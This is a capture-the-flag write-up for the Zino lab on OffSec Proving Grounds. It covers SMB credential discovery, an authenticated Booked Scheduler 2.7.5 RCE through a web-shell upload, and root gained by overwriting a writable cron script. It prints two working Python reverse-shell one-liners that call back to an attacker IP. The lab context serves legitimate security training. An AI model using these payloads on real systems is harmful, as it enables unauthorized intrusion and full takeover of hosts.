Zino

Writeup for Zinofrom from offsec Proving Grounds

Information gathering

sudo ./nmapAutomator.sh 192.168.63.64 all

Service Enumeration

FTP (Port 21)

Doesn't seem like there's much we can do here.

SMB (Port 139,445)

Looks like we can connect as zino without any password.

Since we can also download all the files, let's do that and see if there's anything interesting.

From the misc.log file, it seems like we have some credentials which would be useful later - admin:adminadmin.

HTTP (Port 8003)

Looks like this is running Booked Scheduler v2.7.5 which has a RCE vulnerability. However, we must be authenticated first.

GitHub - F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF: Exploiting Booked Scheduler 2.7.5 - RCE without MSF.GitHub

Exploit

We can try the credentials that we got from misc.log from SMB and we successfully log in.

Seems like we can upload this file which allows us to gain RCE.

From here we can upload a web shell to execute any commands we want.

GitHub - artyuum/Simple-PHP-Web-Shell: Tiny PHP Web shell for executing unix commands from web pageGitHub

Payload: export RHOST="192.168.49.63";export RPORT=3306;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/usr/bin/sh")'

Privesc

Running LinPeas, we can see that cleanup.py is a cron job that runs every 3 mins.

Looking at cleanup.py file permissions, it seems like we have the ability to edit the file.

From here we can just overwrite the data in cleanup.py with our payload:

'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.63",21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now we just wait 3 mins and we got root!